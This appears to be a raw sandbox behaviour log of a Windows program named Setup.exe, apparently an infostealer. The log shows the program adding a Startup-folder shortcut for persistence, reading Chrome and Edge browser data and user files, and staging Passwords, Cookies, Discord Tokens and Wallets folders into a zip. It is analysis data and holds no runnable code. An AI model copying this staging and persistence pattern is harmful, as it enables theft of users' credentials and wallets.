Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1688 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe c:\users\user\appdata\local\programs\setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\shortcut.exe /a:c "/f:c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\setup.lnk" /t:c:\users\user\appdata\local\programs\setup\setup.exe
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2248 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1648 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2304 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1688 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe c:\users\user\appdata\local\programs\setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\shortcut.exe /a:c "/f:c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\setup.lnk" /t:c:\users\user\appdata\local\programs\setup\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2248 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1648 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "c:\users\user\appdata\local\programs\setup\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2304 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\Setup\resources VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\DVWHKMNFNN.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\DVWHKMNFNN.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\HTAGVDFUIE.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\JSDNGYCOWY.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\KATAXZVCPS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\ONBQCLYSPU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\HTAGVDFUIE.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\KATAXZVCPS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\VLZDGUKUTZ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Desktop\JSDNGYCOWY.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Applications VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Browser Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Browser Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Discord Tokens VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Browser Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Discord Tokens VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Important Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Important Files VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords\Microsoft_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Passwords\Microsoft_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies\Google_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Programs VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\Setup VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Roaming\Setup\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\DVWHKMNFNN.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\DVWHKMNFNN.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\HTAGVDFUIE.png VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\JSDNGYCOWY.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\KATAXZVCPS.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\KATAXZVCPS.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Downloads\YPSIACHYXW.png VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\NIKHQAIQAU VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\NWTVCDUMOB VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\RAYHIWGKDI VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\VLZDGUKUTZ.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Documents\VLZDGUKUTZ.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Applications VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Applications VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
